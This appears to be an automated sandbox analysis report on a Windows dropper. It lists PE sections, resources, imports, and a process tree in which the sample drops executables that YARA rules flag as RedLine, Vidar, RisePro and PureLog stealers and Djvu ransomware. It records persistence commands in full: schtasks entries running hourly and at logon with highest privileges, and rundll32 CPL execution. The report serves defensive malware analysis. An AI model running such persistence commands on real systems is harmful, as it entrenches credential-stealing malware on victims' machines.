                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          0x10000x9c10000x26540031a3c0a72e8a38f0b841517b461aaf3aunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          0x9c20000xce80x80052035e05a186f90abc60a6b4df7a93b9False0.9033203125data7.284719044401107IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x9c30000x19e640x1a00013fdfda68b2ed73b67672d1a90926881False0.7123647836538461data6.875099946997904IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .idata0x9dd0000x10000x200911aa9b1ee970578ffa0b7eaa774247bFalse0.412109375data3.2090583705591094IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .tls0x9de0000x10000x200e5a2595f40eb9ed409fa7b0c972218f2False0.052734375data0.26425924870095685IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .themida0x9df0000x41a0000x41a000da15f493521790746943bcea48b4b19funknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          MUI0x9c30880x110data0.5551470588235294
                                          WEVT_TEMPLATE0x225ad40x4f2data1.0086887835703002
                                          RT_BITMAP0x225fc80x1246edata1.0004140952686276
                                          RT_BITMAP0x2384380x1246edata1.0004140952686276
                                          RT_BITMAP0x24a8a80x1246edata1.0004140952686276
                                          RT_BITMAP0x25cd180x1246edata0.9957806999378753
                                          RT_BITMAP0x26f1880x1246eempty0
                                          RT_BITMAP0x2815f80x1246eempty0
                                          RT_BITMAP0x293a680x27c0empty0
                                          RT_BITMAP0x2962280x27c0empty0
                                          RT_BITMAP0x2989e80x37b0empty0
                                          RT_BITMAP0x29c1980x37b0empty0
                                          RT_BITMAP0x29f9480x1246eempty0
                                          RT_BITMAP0x2b1db80x1246eempty0
                                          RT_BITMAP0x2c42280x1246eempty0
                                          RT_BITMAP0x2d66980x1246eempty0
                                          RT_BITMAP0x2e8b080x120d2empty0
                                          RT_BITMAP0x2fabdc0x1246eempty0
                                          RT_BITMAP0x30d04c0x7ef6empty0
                                          RT_BITMAP0x314f440x39eempty0
                                          RT_BITMAP0x3152e40x332empty0
                                          RT_BITMAP0x3156180x247aempty0
                                          RT_BITMAP0x317a940x552empty0
                                          RT_BITMAP0x317fe80x2462empty0
                                          RT_BITMAP0x31a44c0x1246eempty0
                                          RT_BITMAP0x32c8bc0x1246eempty0
                                          RT_BITMAP0x33ed2c0x28e36empty0
                                          RT_BITMAP0x367b640x7ef6empty0
                                          RT_BITMAP0x36fa5c0x33f2empty0
                                          RT_BITMAP0x372e500x33daempty0
                                          RT_ICON0x9c37f40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.500703564727955
                                          RT_ICON0x9c48c40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.3759447331128956
                                          RT_ICON0x9c8b140xca34PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0005022795765397
                                          RT_ICON0x9d55700x668Device independent bitmap graphic, 48 x 96 x 4, image size 11520.34817073170731705
                                          RT_ICON0x9d5c000x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.41801075268817206
                                          RT_ICON0x9d5f100x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 2880.5266393442622951
                                          RT_ICON0x9d61200x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.5675675675675675
                                          RT_ICON0x9d62700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.4400319829424307
                                          RT_ICON0x9d71400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.5040613718411552
                                          RT_ICON0x9d7a100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.5852534562211982
                                          RT_ICON0x9d81000x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.3106936416184971
                                          RT_ICON0x9d86900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.4571576763485477
                                          RT_ICON0x9dac600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.47912757973733583
                                          RT_ICON0x9dbd300x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.7172131147540983
                                          RT_ICON0x9dc6e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.4875886524822695
                                          RT_GROUP_ICON0x9dcb900x30data0.875
                                          RT_GROUP_ICON0x9dcbe80xaedata0.5919540229885057
                                          RT_MANIFEST0x9dccd80x18aASCII text0.4949238578680203
                                          DLLImport
                                          kernel32.dllGetModuleHandleA
                                          KERNEL32GetModuleHandleA
                                          USER32.dllGetCursorPos
                                          ADVAPI32.dllRegCloseKey
                                          SHELL32.dllSHGetFolderPathA
                                          ole32.dllCoCreateInstance
                                          OLEAUT32.dllVariantClear
                                          Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:03:30:59
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\CHA0VZiz8y.exe"
                                          Imagebase:0x140000000
                                          File size:6'923'264 bytes
                                          MD5 hash:F0587649682207064554A2372966435D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:2
                                          Start time:03:31:01
                                          Start date:25/05/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                          Imagebase:0x7ff7e52b0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:03:31:01
                                          Start date:25/05/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
                                          Imagebase:0x7ff7e52b0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:03:31:01
                                          Start date:25/05/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                          Imagebase:0x7ff7e52b0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:6
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          Imagebase:0x8d0000
                                          File size:4'791'448 bytes
                                          MD5 hash:9A78F27AA9D999EEE10CB154BA964869
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000006.00000003.2429156164.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:7
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exe
                                          Imagebase:0x400000
                                          File size:744'960 bytes
                                          MD5 hash:ADD437E239EBA1CEABCA80AF38F80B56
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2311748071.0000000002170000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:true

                                          Target ID:8
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe
                                          Imagebase:0x2967cce0000
                                          File size:80'896 bytes
                                          MD5 hash:0951BF8665040A50D5FB548BE6AC7C1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:9
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exe
                                          Imagebase:0x450000
                                          File size:363'520 bytes
                                          MD5 hash:22152460B13E4C2473DC3FCDEA192933
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:10
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exe
                                          Imagebase:0xa80000
                                          File size:4'795'544 bytes
                                          MD5 hash:6151F5177B7B35E3D7CEE99A2FC9AF24
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:false

                                          Target ID:11
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exe
                                          Imagebase:0xaa0000
                                          File size:470'016 bytes
                                          MD5 hash:D816AEC818E5BE0A3B7AF1AEA4BCA1D8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:12
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exe
                                          Imagebase:0x400000
                                          File size:2'121'216 bytes
                                          MD5 hash:E22EFC95638F4C4E07FD7DABA5BD3154
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000000C.00000002.2320846713.0000000004319000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2337447194.0000000004510000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 0000000C.00000002.2337447194.0000000004510000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2317913229.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 0000000C.00000002.2317913229.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2320846713.0000000004210000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.2320846713.0000000004210000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:13
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exe
                                          Imagebase:0x2e0000
                                          File size:4'815'512 bytes
                                          MD5 hash:C0FEE8DB6325C8C1B3F8CCD13574C65A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000D.00000003.2439988856.0000000005CB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:14
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exe
                                          Imagebase:0x530000
                                          File size:5'154'288 bytes
                                          MD5 hash:D9A7D15AE1511095BC12D4FAA9BE6F70
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2606812448.0000000003C8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exe, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:15
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          Imagebase:0x860000
                                          File size:3'134'464 bytes
                                          MD5 hash:F57F726F9E1B8C24B4F7C275FFAC78CF
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Has exited:true

                                          Target ID:16
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exe
                                          Imagebase:0x400000
                                          File size:5'784'496 bytes
                                          MD5 hash:8B7B381CF7D4F577009F99FCE7E5FD39
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:17
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exe
                                          Imagebase:0x290000
                                          File size:2'793'749 bytes
                                          MD5 hash:32D986D13D2B4B6ACDC7ACE345D66BD4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:18
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exe
                                          Imagebase:0x7ff762ea0000
                                          File size:228'864 bytes
                                          MD5 hash:3955AF54FBAC1E43C945F447D92E4108
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:19
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exe
                                          Imagebase:0x420000
                                          File size:5'382'672 bytes
                                          MD5 hash:029B4A16951A6FB1F6A1FDA9B39769B7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:20
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          Imagebase:0x400000
                                          File size:221'184 bytes
                                          MD5 hash:EEAB6B508F842CE18D229914CD7167F7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000014.00000003.2296250403.0000000004920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000014.00000003.2296250403.0000000004920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Has exited:true

                                          Target ID:21
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exe
                                          Imagebase:0x140000000
                                          File size:11'403'264 bytes
                                          MD5 hash:D43AC79ABE604CAFFEFE6313617079A3
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:22
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exe
                                          Imagebase:0x400000
                                          File size:7'595'262 bytes
                                          MD5 hash:3542F60DFEF8BA16451AB6097587BF63
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:23
                                          Start time:03:31:22
                                          Start date:25/05/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                          Imagebase:0x230000
                                          File size:65'440 bytes
                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:24
                                          Start time:03:31:23
                                          Start date:25/05/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                          Imagebase:0xb90000
                                          File size:65'440 bytes
                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:25
                                          Start time:03:31:23
                                          Start date:25/05/2024
                                          Path:C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp" /SL5="$4042A,5528781,54272,C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exe"
                                          Imagebase:0x7ff6068e0000
                                          File size:696'832 bytes
                                          MD5 hash:73919C5267ECFF99768AE00DFA5D9C3F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:26
                                          Start time:03:31:23
                                          Start date:25/05/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                          Imagebase:0xf10000
                                          File size:65'440 bytes
                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:27
                                          Start time:03:31:26
                                          Start date:25/05/2024
                                          Path:C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exe
                                          Imagebase:0x400000
                                          File size:744'960 bytes
                                          MD5 hash:ADD437E239EBA1CEABCA80AF38F80B56
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001B.00000002.2662012015.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001B.00000002.2662012015.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001B.00000002.2662012015.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                          Has exited:true

                                          Target ID:28
                                          Start time:03:31:26
                                          Start date:25/05/2024
                                          Path:C:\Users\user\AppData\Local\Temp\kat806.tmp
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Local\Temp\kat806.tmp
                                          Imagebase:0x400000
                                          File size:881'664 bytes
                                          MD5 hash:66064DBDB70A5EB15EBF3BF65ABA254B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 4%, ReversingLabs
                                          Has exited:false

                                          Target ID:29
                                          Start time:03:31:27
                                          Start date:25/05/2024
                                          Path:C:\Users\user\AppData\Local\Turquoise CD Player\turquoisecdplayer.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Turquoise CD Player\turquoisecdplayer.exe" -i
                                          Imagebase:0x400000
                                          File size:2'817'403 bytes
                                          MD5 hash:578530F1C73BA58C2D868B45C7223945
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:30
                                          Start time:03:31:27
                                          Start date:25/05/2024
                                          Path:C:\Users\user\AppData\Local\Temp\7zSFB35.tmp\Install.exe
                                          Wow64 process (32bit):true
                                          Commandline:.\Install.exe
                                          Imagebase:0x400000
                                          File size:6'678'961 bytes
                                          MD5 hash:0EC8D7480C7D858848914B24584B17B4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:32
                                          Start time:03:31:29
                                          Start date:25/05/2024
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                          Imagebase:0x890000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:33
                                          Start time:03:31:29
                                          Start date:25/05/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:34
                                          Start time:03:31:30
                                          Start date:25/05/2024
                                          Path:C:\Windows\SysWOW64\control.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\control.exe" "C:\Users\user\AppData\Local\Temp\eKhLlZQ.CPL",
                                          Imagebase:0xe80000
                                          File size:149'504 bytes
                                          MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:35
                                          Start time:03:31:30
                                          Start date:25/05/2024
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                          Imagebase:0x890000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:36
                                          Start time:03:31:30
                                          Start date:25/05/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:37
                                          Start time:03:31:30
                                          Start date:25/05/2024
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\eKhLlZQ.CPL",
                                          Imagebase:0x260000
                                          File size:61'440 bytes
                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:38
                                          Start time:03:31:31
                                          Start date:25/05/2024
                                          Path:C:\Users\user\AppData\Local\Temp\7zSD75.tmp\Install.exe
                                          Wow64 process (32bit):true
                                          Commandline:.\Install.exe /jfXIEdidloJv "525403" /S
